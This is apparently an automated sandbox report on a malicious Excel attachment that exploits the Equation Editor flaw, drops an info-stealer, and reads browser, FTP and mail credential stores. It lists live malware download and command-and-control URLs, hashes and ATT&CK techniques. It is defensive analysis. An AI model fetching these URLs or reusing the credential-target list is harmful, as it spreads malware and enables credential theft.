              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2556, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: PopPassword
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: SmtpPassword
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts12
              Native API
              Path Interception1
              Extra Window Memory Injection
              1
              Deobfuscate/Decode Files or Information
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium15
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts13
              Exploitation for Client Execution
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              2
              Credentials in Registry
              1
              Account Discovery
              Remote Desktop Protocol1
              Man in the Browser
              Exfiltration Over Bluetooth1
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)111
              Process Injection
              1
              Extra Window Memory Injection
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares2
              Data from Local System
              Automated Exfiltration4
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
              Masquerading
              NTDS26
              System Information Discovery
              Distributed Component Object Model1
              Email Collection
              Scheduled Transfer124
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
              Virtualization/Sandbox Evasion
              LSA Secrets131
              Security Software Discovery
              SSH1
              Clipboard Data
              Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Access Token Manipulation
              Cached Domain Credentials11
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items111
              Process Injection
              DCSync1
              System Owner/User Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Remote System Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Behavior Graph (ID: 569962; Sample: _2201S_BUSAN_HOCHIMINH_.xlsx; Start date: 10/02/2022; Architecture: WINDOWS; Score: 100)
              Process chain: EQNEDT32.EXE started vbc.exe, which started xmtxpy.exe, which started a second xmtxpy.exe; EXCEL.EXE was started separately.

              Source | Detection | Scanner | Label | Link
              _2201S_BUSAN_HOCHIMINH_.xlsx | 35% | Virustotal | | Browse
              _2201S_BUSAN_HOCHIMINH_.xlsx | 33% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882 |

              Source | Detection | Scanner | Label | Link
              C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | |
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe | 100% | Joe Sandbox ML | |
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe | 21% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe | 23% | ReversingLabs | Win32.Backdoor.Androm |

              Source | Detection | Scanner | Label | Link | Download
              6.0.xmtxpy.exe.400000.11.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
              6.2.xmtxpy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
              6.0.xmtxpy.exe.400000.15.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
              5.2.xmtxpy.exe.130000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
              6.0.xmtxpy.exe.400000.13.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
              6.0.xmtxpy.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
              6.0.xmtxpy.exe.400000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
              6.0.xmtxpy.exe.400000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File

              No Antivirus matches

              Source | Detection | Scanner | Label | Link
              http://198.46.132.195/windowSSH/.win32.exe | 8% | Virustotal | | Browse
              http://198.46.132.195/windowSSH/.win32.exe | 100% | Avira URL Cloud | malware |
              http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe |
              http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe |
              http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe |
              http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe |
              http://www.ibsensoftware.com/ | 0% | URL Reputation | safe |
              http://asiaoil.bar//bobby/five/fre.php | 1% | Virustotal | | Browse
              http://asiaoil.bar//bobby/five/fre.php | 100% | Avira URL Cloud | malware |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              asiaoil.bar | 172.67.197.66 | true | true | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              http://198.46.132.195/windowSSH/.win32.exe | true | 8%, Virustotal, Browse; Avira URL Cloud: malware | unknown
              http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
              http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
              http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
              http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
              http://asiaoil.bar//bobby/five/fre.php | true | 1%, Virustotal, Browse; Avira URL Cloud: malware | unknown

              Name | Source | Malicious | Antivirus Detection | Reputation
              http://nsis.sf.net/NSIS_Error | vbc.exe, vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.dr | false | | high
              http://nsis.sf.net/NSIS_ErrorError | vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.dr | false | | high
              http://www.ibsensoftware.com/ | xmtxpy.exe, xmtxpy.exe, 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, xmtxpy.exe, 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                    198.46.132.195 | unknown | United States | | 36352 | AS-COLOCROSSINGUS | true
                    104.21.49.244 | unknown | United States | | 13335 | CLOUDFLARENETUS | true
                    172.67.197.66 | asiaoil.bar | United States | | 13335 | CLOUDFLARENETUS | true
                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:569962
                    Start date:10.02.2022
                    Start time:10:20:40
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 3s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:_2201S_BUSAN_HOCHIMINH_.xlsx
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winXLSX@8/27@81/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 72.4% (good quality ratio 69.6%)
                    • Quality average: 78.5%
                    • Quality standard deviation: 27.9%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsx
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                    • HTTP Packets have been reduced
                    • TCP Packets have been reduced to 100
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    Time: 10:21:38
                    Type: API Interceptor
                    Description: 50x Sleep call for process: EQNEDT32.EXE modified

                    Time: 10:21:47
                    Type: API Interceptor
                    Description: 771x Sleep call for process: xmtxpy.exe modified
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Category:downloaded
                    Size (bytes):295124
                    Entropy (8bit):7.944502610174892
                    Encrypted:false
                    SSDEEP:6144:ow2pJekU4t1+9AJci0mJVmkzcOsggBk4u9aTTozAlJixJFfDqXR0e:eJekU4zuAJv0mupOtWu9aIcTR0e
                    MD5:7DF1896047D9647D818080DD17563D92
                    SHA1:A7C2BC04EC70C0F439E2A0863096FA7D391F79C5
                    SHA-256:9CBED5EFF56E1C08B6040C8AB4977E76528D59368D9D0550626B5380513ECB7B
                    SHA-512:1558B4573F82B4B6F34E96591A5A4CF4533C30BEC9D65C3BC1435FEB0119F23EB91E5C7E771D58F502199BB3CDE272C3135CD8A8F3944D87E8759D23A340D01D
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Virustotal, Detection: 21%, Browse
                    • Antivirus: ReversingLabs, Detection: 23%
                    Reputation:low
                    IE Cache URL:http://198.46.132.195/windowSSH/.win32.exe
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):3747
                    Entropy (8bit):7.932023348968795
                    Encrypted:false
                    SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                    MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                    SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                    SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                    SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):1099960
                    Entropy (8bit):2.015315240232208
                    Encrypted:false
                    SSDEEP:3072:gXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:OahIFdyiaT2qtXl
                    MD5:15A27F5C7EF8F89145A89ECF451B90D4
                    SHA1:EC1F1BCB1324FDBB9FAE80EF1003B57D727100F4
                    SHA-256:637B6C47252552D5DBD483BDD47DE9BCB5B041AB0EECBF523FDC0145D8154213
                    SHA-512:78BBBD3DBB637F7BEE3724CEADAFFD362567A951EF9374F1E8398B9C37E0C7A1ECB74BAB56B9B331AC0F524E8E97658BC0625238F2EF383F51420FBFC8EABD22
                    Malicious:false
                    Reputation:low
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):10202
                    Entropy (8bit):7.870143202588524
                    Encrypted:false
                    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                    MD5:66EF10508ED9AE9871D59F267FBE15AA
                    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):2647
                    Entropy (8bit):7.8900124483490135
                    Encrypted:false
                    SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                    MD5:E46357D82EBC866EEBDA98FA8F94B385
                    SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                    SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                    SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):11303
                    Entropy (8bit):7.909402464702408
                    Encrypted:false
                    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):5396
                    Entropy (8bit):7.915293088075047
                    Encrypted:false
                    SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                    MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                    SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                    SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                    SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                    Category:dropped
                    Size (bytes):4396
                    Entropy (8bit):7.884233298494423
                    Encrypted:false
                    SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                    MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                    SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                    SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                    SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                    Malicious:false
                    Process:C:\Users\Public\vbc.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):219608
                    Entropy (8bit):7.9897314726108535
                    Encrypted:false
                    SSDEEP:3072:HeVPHh1pYGP+TmX9fEv0W8Uc3pLmEavCycHI77blslGnM4Xryc7oxwdO8cRMJa3m:HeVfhf2uUSad7io3r2xGO8cRMYNrG+i
                    MD5:AC8E973D953305B03019CDB74006099C
                    SHA1:7976E0BE0FC69E238DAF16DB2BFF833340536C4E
                    SHA-256:2F62F941918151FCED3AD854B37DCDA1E40E91432D772781EBC2118E28987B41
                    SHA-512:3719354FA157A48C919AC13D1DA71DF1142D24448462355B83BD52FC3D3B8F8BF39E052FAFA3E9A961B3ED200FBBE8BD5C84716B9782392C75EFF34ADFFF38AB
                    Malicious:false
                    Process:C:\Users\Public\vbc.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4858
                    Entropy (8bit):6.17383796672968
                    Encrypted:false
                    SSDEEP:96:nt0EwCLn8tWfofJ1QSZe8ozFieNdFhpQbxxszw8PX/9LOz8AQK:t5n8kUHQSwFieNdFhGbH8PXIz8AQK
                    MD5:CB3FBCC52C7B5805ACF1F81D65488D89
                    SHA1:EAD5B088DA9F7466D9E10537A449A2F8C7505E85
                    SHA-256:05FB79420AADA2C2199CABAD68F4D6483127D2D803A5FD4E755008E78A977931
                    SHA-512:9CFB8EA161797F5131AC4780CBEE9FB8E56FADEEEBEC7D39BFC96416F1949D5E0247FA0F7B1E71C415BC9A08CCE1AAFF4003BBA9221CFB7F77A629794F8933CD
                    Malicious:false
                    Process:C:\Users\Public\vbc.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):354872
                    Entropy (8bit):7.605710868367885
                    Encrypted:false
                    SSDEEP:6144:oIeVfhf2uUSad7io3r2xGO8cRMYNrG+ehVpsA7bejlOmKCS:OhfZ07isKRZrleV7/+4mKCS
                    MD5:EE5B2397743F917D9F93DF1631178B23
                    SHA1:2F039C1927989531F121F34D6BF43DEB5703405E
                    SHA-256:6B105FD88793034BDD4A7B6A45E7EC131C36C20D8FAABC4B4AEA557C905C73D5
                    SHA-512:82DB48AE41CC1A0069CDDC2B9A5E28E9197521C59EA580500C577F39B5B3D0D7F4D8EEF186204FB33C7A12D7627F949BEE98890CC9F07E91182740B860E37D85
                    Malicious:false
                    Process:C:\Users\Public\vbc.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):125440
                    Entropy (8bit):6.382878598936808
                    Encrypted:false
                    SSDEEP:3072:8WbTBVpk7JTDA7SbfsejlOmaDjCsOPthVE:jhVpsA7bejlOmKCS
                    MD5:1EACD504E4461F9EE286715997D8A9EE
                    SHA1:64554FE410BB0B335373E99D2F8AA37800F30FDD
                    SHA-256:DE398BE02D5ABE9C8BCE84380AC5303EA00FC00820A50CAD007220F24538B3DE
                    SHA-512:A253CEC08A167F348D84677F6A992AE306F607C9AD9A10EF6AF03288E7D4A158A07056A50A0909E22B1A89B79386EA44C984754018A25817E22FF6167A6A6156
                    Malicious:true
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:CDFV2 Encrypted
                    Category:dropped
                    Size (bytes):191736
                    Entropy (8bit):7.958679742635318
                    Encrypted:false
                    SSDEEP:3072:W3x5yiKm7/AJj6GEOux8NBVuVnDcq3QT0PyYC9v1EFVW3NdR31od+xXfwsRYXn0D:uam7/AJ6GsWBVuV4MaB9voVWdT3iWPws
                    MD5:CF8B307CAA943326EE808BB3CB02DEEE
                    SHA1:705C25ADBDB7B805E47566540B3804EBA178E7DA
                    SHA-256:CBE84E2C523FD51DABB1365DF50415FFC51F8159C36798061742F08BA5D31B9B
                    SHA-512:CFC3AE790C2E17051A4B03214BAEFD44EB30E8601BF8AFD2D711CD197263854E96C19C2486A8838A1971607E09AD6728F6B9D8D982F6395B1FFC7D9C7EB599AA
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                    Malicious:false
                    Process:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):125440
                    Entropy (8bit):6.382878598936808
                    Encrypted:false
                    SSDEEP:3072:8WbTBVpk7JTDA7SbfsejlOmaDjCsOPthVE:jhVpsA7bejlOmKCS
                    MD5:1EACD504E4461F9EE286715997D8A9EE
                    SHA1:64554FE410BB0B335373E99D2F8AA37800F30FDD
                    SHA-256:DE398BE02D5ABE9C8BCE84380AC5303EA00FC00820A50CAD007220F24538B3DE
                    SHA-512:A253CEC08A167F348D84677F6A992AE306F607C9AD9A10EF6AF03288E7D4A158A07056A50A0909E22B1A89B79386EA44C984754018A25817E22FF6167A6A6156
                    Malicious:false
                    Process:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1
                    Process:C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):46
                    Entropy (8bit):1.0424600748477153
                    Encrypted:false
                    SSDEEP:3:/lbWwWl:sZ
                    MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                    SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                    SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                    SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                    Malicious:false
                    Preview:........................................user.
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Category:dropped
                    Size (bytes):295124
                    Entropy (8bit):7.944502610174892
                    Encrypted:false
